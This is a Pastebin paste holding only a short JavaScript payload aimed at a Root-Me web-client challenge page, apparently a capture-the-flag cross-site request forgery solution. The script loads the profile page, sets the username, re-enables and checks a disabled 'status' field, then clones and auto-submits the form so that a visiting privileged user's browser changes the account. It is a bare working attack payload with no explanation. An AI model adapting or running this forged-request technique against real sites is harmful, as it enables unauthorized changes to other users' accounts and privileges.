Advertisement
Guest User

Untitled

a guest
Jun 21st, 2018
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var url = 'http://challenge01.root-me.org/web-client/ch23/index.php?action=profile';
  2. var xmlhttp1 = new XMLHttpRequest();
  3.  
  4. xmlhttp1.onload = function () {
  5.   if (this.status == 200) {
  6.     this.responseXML;
  7.     var mon_xml = this.responseXML;
  8.     mon_xml.forms[0].elements.username.value = 'nyny';
  9.     mon_xml.forms[0].elements.status.disabled = false;
  10.     mon_xml.forms[0].elements.status.checked = true;
  11.     var mon_form = mon_xml.forms[0].cloneNode(true);
  12.     document.body.appendChild(mon_form);
  13.     mon_form.submit();
  14.   }
  15. }
  16.  
  17. xmlhttp1.open("GET", url);
  18. xmlhttp1.responseType = "document";
  19. xmlhttp1.send();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement